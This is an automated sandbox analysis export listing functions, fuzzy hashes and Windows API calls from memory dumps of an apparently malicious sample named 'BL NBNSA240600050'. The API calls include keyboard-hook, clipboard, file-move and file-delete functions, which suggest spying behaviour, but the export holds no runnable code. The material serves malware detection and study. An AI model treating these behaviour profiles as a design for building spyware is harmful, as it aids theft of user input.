Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: 478cc51986748dedef6edcc4d6cf907730871d1ca2c3b92de7571a68c77b5461
Instruction ID: 3b5782bb21fc4ee48d3edaab202b01f84f142a60647541c0bda0c7e055e92815
Opcode Fuzzy Hash: 478cc51986748dedef6edcc4d6cf907730871d1ca2c3b92de7571a68c77b5461
Instruction Fuzzy Hash: E5325F35E1061ACFDB14EF78D89459DB7B6FF89300F20C65AD409A7264EB30AD85CB91

Function 063DCEC8 Relevance: 4.6, Strings: 3, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 063DD2D3
$kq, xrefs: 063DD2BF
$kq, xrefs: 063DD2C7

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq
API String ID: 0-2086306503
Opcode ID: efe83ba88eb05e3f6c19856b023b38f8b6706bdea38cb51a81d8c41e1087f64f
Instruction ID: 03b094e30530be7055016754d9944542e3e3d9d9ce358580088a32337e2af90f
Opcode Fuzzy Hash: efe83ba88eb05e3f6c19856b023b38f8b6706bdea38cb51a81d8c41e1087f64f
Instruction Fuzzy Hash: A6622D30A002068FCB55EF68E590A5EB7F6FF85304B209968D4159F369DB75ED8ACBC0

Function 063D78F8 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 063D7C41
$kq, xrefs: 063D7C35

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: f268af5b12f8338e4e24198af507c63521ec627dea825ef1cca6e141313a56b8
Instruction ID: fb52f5005dcb30291554f788ef289b256c85515e8eeaaffc47efc2bc5ed3e263
Opcode Fuzzy Hash: f268af5b12f8338e4e24198af507c63521ec627dea825ef1cca6e141313a56b8
Instruction Fuzzy Hash: EE029E31B102058FDB54DB65E5906AEB7F6FF85300F248529E4069B399EB35EC8ACBD0

Function 063D2340 Relevance: 1.0, Instructions: 1016COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7631e69524c03306cec90d392af75300f7dee12942afc81d26c9facebe60b6
Instruction ID: d7ab8dca453841bd2094e2577b2175355931738fdce8571a1f8e9c2f20b5497d
Opcode Fuzzy Hash: 2d7631e69524c03306cec90d392af75300f7dee12942afc81d26c9facebe60b6
Instruction Fuzzy Hash: 68925735E002048FDB64DF68D584A5EB7F2FF45310F5488A9E909AB365DB35EE89CB80

Function 063D6160 Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b64fa096f4f20a8ef1268d9a08e3a43824bf65f27eb2151a033695a0429e1a5
Instruction ID: c97d63725c2bebddcf52d8d92238db345c227c1bbfd4b8d5c1f566ec1de53fcd
Opcode Fuzzy Hash: 9b64fa096f4f20a8ef1268d9a08e3a43824bf65f27eb2151a033695a0429e1a5
Instruction Fuzzy Hash: 6B62CD35B002058FDB54DB68E551AAEB7F2EF86310F148429E426EB395DB35ED89CBC0

Function 063DC0F8 Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257e2db55dee6c7472e2e8124813e6b0b7825743611525de72a06874de773736
Instruction ID: 915b071523b82547ef5268644b6d2f6b6ded07061b70631527587c86f37bc2bf
Opcode Fuzzy Hash: 257e2db55dee6c7472e2e8124813e6b0b7825743611525de72a06874de773736
Instruction Fuzzy Hash: 0032AF35F202098FDF50DB68E990AAEB7B6EB89310F109525E405DB359DB34EC4ACB90

Function 063D5150 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76b4d059732d2179fc50c4f8f4998f2e5b2a3a2dc98225727db397bbc7b152b
Instruction ID: 0a9a0e4a4efa27ad17a8f1bddfb0aabfcefd55dfc621de903735544d561ae245
Opcode Fuzzy Hash: d76b4d059732d2179fc50c4f8f4998f2e5b2a3a2dc98225727db397bbc7b152b
Instruction Fuzzy Hash: CC12D332F002059FDF60DB64E98076EB7B6EB85320F248429E8569B385DB34EC49CBD1

Function 063DAD90 Relevance: .6, Instructions: 570COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb2cfb7c2bb45e649d106ba052632a726a67bcb5a861551bdf3ea1ec3ca1b09
Instruction ID: d2f18bd2a6734100147bb51dd321bd359e7b15588de704254f83d6d3a31deff4
Opcode Fuzzy Hash: 7eb2cfb7c2bb45e649d106ba052632a726a67bcb5a861551bdf3ea1ec3ca1b09
Instruction Fuzzy Hash: 8D228071E002098FDF64CB68E9907AEF7B6EB45310F218826E416DB395DB35DC89CB91

Function 063DA838 Relevance: 10.4, Strings: 8, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 063DA959
$kq, xrefs: 063DA9B8
$kq, xrefs: 063DA9E7
$kq, xrefs: 063DA965
$kq, xrefs: 063DA9AC
$kq, xrefs: 063DA9DB
$kq, xrefs: 063DAA10
$kq, xrefs: 063DAA04

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1078448309
Opcode ID: 3806c81e72d369695cfac76abd9f3fbcdeb721f02c876633eb31636f8ef5d24d
Instruction ID: 4174c7760aeb7481b6d89a6181e3fa4cad9fdb693eeb7632ae45dc1f4d18ca2e
Opcode Fuzzy Hash: 3806c81e72d369695cfac76abd9f3fbcdeb721f02c876633eb31636f8ef5d24d
Instruction Fuzzy Hash: CAE19031F102498FCB65DB69E6906AEB7F6FF85300F208529D4059B359DB35E84ACBD0

Function 06376AAF Relevance: 6.2, APIs: 4, Instructions: 225
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06376BA6
GetCurrentThread.KERNEL32 ref: 06376BE3
GetCurrentProcess.KERNEL32 ref: 06376C20
GetCurrentThreadId.KERNEL32 ref: 06376C79
CallWindowProcW.USER32(?,?,?,?,?), ref: 06377CC9

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: Current$ProcessThread$CallProcWindow
String ID:
API String ID: 1744009068-0
Opcode ID: 5f18d3d4802b55cacf350eca505132ec0727bc12b1b75c92263d7945f1fe5518
Instruction ID: 04c5c6be9c2cb96d1f85c593f95ea2af684c5550dd7dab21c6e5695d19b5620d
Opcode Fuzzy Hash: 5f18d3d4802b55cacf350eca505132ec0727bc12b1b75c92263d7945f1fe5518
Instruction Fuzzy Hash: 8291BAB4D003498FCB50CFA9C848ADEBFF1EF49314F24845AE049A7261D734A984CFA5

Function 06376B19 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06376BA6
GetCurrentThread.KERNEL32 ref: 06376BE3
GetCurrentProcess.KERNEL32 ref: 06376C20
GetCurrentThreadId.KERNEL32 ref: 06376C79

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8ac29402b62e775799d5d3ffc56dfcd932db452ca2f9e52f167a9ee2662dbed9
Instruction ID: 73c1733559d95b7fbc537b9847dc8ab6f1ba405b2839fa98d86f3c812860ef4f
Opcode Fuzzy Hash: 8ac29402b62e775799d5d3ffc56dfcd932db452ca2f9e52f167a9ee2662dbed9
Instruction Fuzzy Hash: 005168B49007498FDB54DFAAD9487DEBFF1EF49304F20845AE049A7260D734A984CFA5

Function 06376B28 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06376BA6
GetCurrentThread.KERNEL32 ref: 06376BE3
GetCurrentProcess.KERNEL32 ref: 06376C20
GetCurrentThreadId.KERNEL32 ref: 06376C79

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1edfcb86390d18c8b0b3c8555d6bb492182742fe1ea4e2011b03415b8524fdf5
Instruction ID: 0a621c535a06ff2e69a9b5a8570e13aa128f6696b2adf67a40558d35bf9a0d0d
Opcode Fuzzy Hash: 1edfcb86390d18c8b0b3c8555d6bb492182742fe1ea4e2011b03415b8524fdf5
Instruction Fuzzy Hash: 875147B4900749CFDB54DFAAD948BDEBBF1EB49314F208419E009A7360D778A944CFA5

Function 063D8CC8 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 063D8D0F
$kq, xrefs: 063D8D4A
$kq, xrefs: 063D8D1B
$kq, xrefs: 063D8D56

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 97b025237f8e184411130934630d71e3a3709718efd5da14316eaf6dad1ea214
Instruction ID: 69a3db34e67a594be041999a1e7b7034a9c5150fd9d8536153d63ce2e46bf931
Opcode Fuzzy Hash: 97b025237f8e184411130934630d71e3a3709718efd5da14316eaf6dad1ea214
Instruction Fuzzy Hash: 39916035F0021A8FCB64DF65D9907AFB3F6AF85240F10846AD509AB398EB34ED45CB90

Function 063D4718 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPpq, xrefs: 063D4845
fpq, xrefs: 063D4E25
\Opq, xrefs: 063D48CF

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: fpq$XPpq$\Opq
API String ID: 0-2571271785
Opcode ID: bbd34a74f57a18a0de0ba0bc7f6804ffa8f05f6e4cead62ed269531c4525b715
Instruction ID: 3f50cc71153487ba6267cb9c180ef5d8d9ef1cb5bc693774e4964b2f038ed009
Opcode Fuzzy Hash: bbd34a74f57a18a0de0ba0bc7f6804ffa8f05f6e4cead62ed269531c4525b715
Instruction Fuzzy Hash: 9F619235F002099FEF549FA5D8147AEBBF6FF89300F208029E506AB396DB759C458B90

Function 063D8CB7 Relevance: 2.7, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 063D8D0F
$kq, xrefs: 063D8D4A

Memory Dump Source

Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: 481a790f06ca3d91de8fba1fe8eee080208dfd578820e46a3f0b1d75be24325b
Instruction ID: d0eb417e06f12a89a5fee8e27bb6c5934a648fcc4844dab2fe8e96d43db5cc51
Opcode Fuzzy Hash: 481a790f06ca3d91de8fba1fe8eee080208dfd578820e46a3f0b1d75be24325b
Instruction Fuzzy Hash: B6514035B001098FDBA4EF75D990BAF73F6EB85640F10846AC5069B398EB35EC02CB90

Function 0637328D Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 063733AA

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8dfc45e13d81807ec659108bf2d5a399be189702bb1ae1c5d46c3265c854aa31
Instruction ID: 6f714554f1977191490274373a1d8323961d3c7eaf9849c7a02f71b3f3b27074
Opcode Fuzzy Hash: 8dfc45e13d81807ec659108bf2d5a399be189702bb1ae1c5d46c3265c854aa31
Instruction Fuzzy Hash: 6F51C0B5D00319AFEB24CF99C984ADEBBB5BF48310F24812AE419AB210D7759985CF90

Function 06373298 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 063733AA

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b763641a07d02e559a9c8c46d6c4ea74cc4b6aae75818224ed8dbed1d1c6476c
Instruction ID: ff2ecca33f1a70e28f81a22c480d937f84a969af16a3cb006aa45574f9d920b6
Opcode Fuzzy Hash: b763641a07d02e559a9c8c46d6c4ea74cc4b6aae75818224ed8dbed1d1c6476c
Instruction Fuzzy Hash: 6941B0B5D00319DFEB24CF9AC984ADEBBB5FF48310F24812AE419AB250D7759885CF90

Function 06376ADC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06377CC9

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: f72f68e04230f15622902f49347a2f97ea18d38fd79add1e0b3bd67b36bd0e89
Instruction ID: 832f3de8a89f2bb70b1d3465ecb0355526785b70bf42baaf7a45a7f0038f9d19
Opcode Fuzzy Hash: f72f68e04230f15622902f49347a2f97ea18d38fd79add1e0b3bd67b36bd0e89
Instruction Fuzzy Hash: 8D4117B9A00305CFDB54CF99C488AAABBF5FF88314F24C859D519AB321D774A845CFA4

Function 00D077E3 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00D086C0

Memory Dump Source

Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 1b69a917fbf3a720a568ede8f29b36df02a485248d9f5a930b968b980c0ceedc
Instruction ID: b4c8e6237f24d8031a5ae56340ee7c86419b854c5576cb6b9de46dfe5d0bfb29
Opcode Fuzzy Hash: 1b69a917fbf3a720a568ede8f29b36df02a485248d9f5a930b968b980c0ceedc
Instruction Fuzzy Hash: A1319EB5C053489FCB00CF99D844ADEBFF0FF49320F19805AD858AB296D7755944CBA5

Function 06378944 Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 063789D8

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 8cd69605670f73297e7480c6f62e86e0ba01aea57994fdc2439d25d90f171f2b
Instruction ID: 2c586953000e562074ddbce3a13276c3cd03e4198ee0921f3e35ff4b2e588a70
Opcode Fuzzy Hash: 8cd69605670f73297e7480c6f62e86e0ba01aea57994fdc2439d25d90f171f2b
Instruction Fuzzy Hash: 493114B0D01249DFDB60CF99C984BCEBBF5AB48304F248069E408BB294DB786845CBA5

Function 06378950 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 063789D8

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 2ef37de9c5a0246365e728aa461ff180056ed7a2ca035ae665d7eb2f1c609ff9
Instruction ID: 991403f33218604b7ab85d1d973bee828a8596900947da33b528674e02b7a702
Opcode Fuzzy Hash: 2ef37de9c5a0246365e728aa461ff180056ed7a2ca035ae665d7eb2f1c609ff9
Instruction Fuzzy Hash: 5431E2B0D01209DFDB64CF99C988B8EBBF5AB48314F248069E408BB294DB746845CBA5

Function 06376D68 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06376DF7

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b9e9031f80076a330917f2e1c56dac9c8d8a89aaac20d67e47fa0316e1cc7e8e
Instruction ID: 4d0782f9471a2bbeff9d57bd34975e9846f675e0ac81d46e12370ccac1f22547
Opcode Fuzzy Hash: b9e9031f80076a330917f2e1c56dac9c8d8a89aaac20d67e47fa0316e1cc7e8e
Instruction Fuzzy Hash: 4B2119B5D00248EFDB10CF99D984ADEBFF9EB48310F14801AE954A3310D374A944CFA4

Function 00D08628 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00D086C0

Memory Dump Source

Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: ef0fc1be8150f5ea7ec9799055adc9bb3a5dd607e5dc4a701799a3611498d289
Instruction ID: 7f5190a468924beda5f208d52bd057a658c90f2c75d80cd0142b6e9a3a108165
Opcode Fuzzy Hash: ef0fc1be8150f5ea7ec9799055adc9bb3a5dd607e5dc4a701799a3611498d289
Instruction Fuzzy Hash: 8B2124B6C012089FCB10CF99E484ADEFFB1FB88310F24815AE858AB345C7759A45CFA4

Function 00D07808 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00D086C0

Memory Dump Source

Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 4e2c0b7e0e679faf9e54456c45cf461d7e76e5ac8de173887f5c03b49db8ce63
Instruction ID: ba5d052dc98ac04c9208fbec84acdd0695b836137f6bd101c6b951787b86da59
Opcode Fuzzy Hash: 4e2c0b7e0e679faf9e54456c45cf461d7e76e5ac8de173887f5c03b49db8ce63
Instruction Fuzzy Hash: C02124B6C012189FCB10CF99D884BDEBBF5FB88310F25805AE858AB344D7759940CBA4

Function 06376D70 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06376DF7

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3cafb5820d48655c6f88b47ab106aab66212008196bbbffcab313fd27f210063
Instruction ID: 5ba93e3103bbb976e93e46a43087b09166ad11b5c12667cd7ff72ae9aa42e317
Opcode Fuzzy Hash: 3cafb5820d48655c6f88b47ab106aab66212008196bbbffcab313fd27f210063
Instruction Fuzzy Hash: 7321E4B5D00258DFDB10CF9AD984ADEBFF9EB48320F14841AE918A7350D378A944CFA4

Function 0637A708 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0637A78B

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: a84f7f854beaf467f98a72c5798093e2890d827db4cc7d155599238536a107f5
Instruction ID: 34f318ac4fc22333621d1e8ff9073e55017de5acf3295d1c14ade152f3eb4876
Opcode Fuzzy Hash: a84f7f854beaf467f98a72c5798093e2890d827db4cc7d155599238536a107f5
Instruction Fuzzy Hash: E02149B5D002499FCB14CFA9C944BEEFBF5EF88320F10842AD499A7250C774A944CFA4

Function 06377D5C Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06378315), ref: 0637839F

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 2c46dd49e6c2969634e2b0f01f9a35612175017ac47136a530b50bd609fff46b
Instruction ID: d5765bb1b2c5552186bf93d69d4363c31b01514bd81053c2382856e01b009609
Opcode Fuzzy Hash: 2c46dd49e6c2969634e2b0f01f9a35612175017ac47136a530b50bd609fff46b
Instruction Fuzzy Hash: FC219DB58053988FCB11DFADC8947DEBFF4AF4A310F10409AD494A7251D278A848CFA9

Function 063721D3 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06372256

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2534b46bbd368eb9dac8febfd787804c35661652a92765d563d70ffd37f53974
Instruction ID: 0dd6d9a96e66a745391c1907c5f16cc39c80d3c499f9c53df743e72b4210debf
Opcode Fuzzy Hash: 2534b46bbd368eb9dac8febfd787804c35661652a92765d563d70ffd37f53974
Instruction Fuzzy Hash: B3215EB5C053888FCB11CFAAC444ACEFFF4EF4A210F14859AD458A7252C378A549CFA1

Function 00D08058 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 00D080D0

Memory Dump Source

Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6ebea1823454aa28dc7f8df4887df501ac1e46fce4313e2509e09dd8ac306a1b
Instruction ID: 4e3e9bc2e0b344e3acef7130c232f4c9c0d7aca91188a4c8207052d14a877dad
Opcode Fuzzy Hash: 6ebea1823454aa28dc7f8df4887df501ac1e46fce4313e2509e09dd8ac306a1b
Instruction Fuzzy Hash: C32144B1C006599FCB20CFAAD444BEEFBB0AB48320F14812AD858B7241D778A945CFA4

Function 0637A710 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0637A78B

Memory Dump Source

Source File: 00000002.00000002.4144621319.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6370000_BL NBNSA240600050.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: b332219e03ab7132b99e806f4b6d3541952a74040980f3ba2f3c1ad7211fcbce
Instruction ID: 3eda044ee69a0e83636471fd8dcb38a4c79ab553089ec26b319728e64febd8ee
Opcode Fuzzy Hash: b332219e03ab7132b99e806f4b6d3541952a74040980f3ba2f3c1ad7211fcbce
Instruction Fuzzy Hash: 5B2127B5D002499FCB14CF99C944BDEFBF5EB88320F10842AD459A7250C774A944CFA5

Function 00D08060 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 00D080D0

Memory Dump Source

Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 54d2dc6d17d5c3c0d69f0710ba7ce1ca2f21a423ed653fab815be49ab2dc2f30
Instruction ID: 46098de9a79c192606da6bdc14bb25f4c095ee53fcb1da41e2147a21ec5f6827
Opcode Fuzzy Hash: 54d2dc6d17d5c3c0d69f0710ba7ce1ca2f21a423ed653fab815be49ab2dc2f30
Instruction Fuzzy Hash: 631103B5C0066A9BCB14CF9AD544B9EFBB4BB48320F14812AD858A7390D778A944CFA5

Function 00D0F412 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 00D0F47F

Memory Dump Source

Source File: 00000002.00000002.4115229825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d00000_BL NBNSA240600050.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
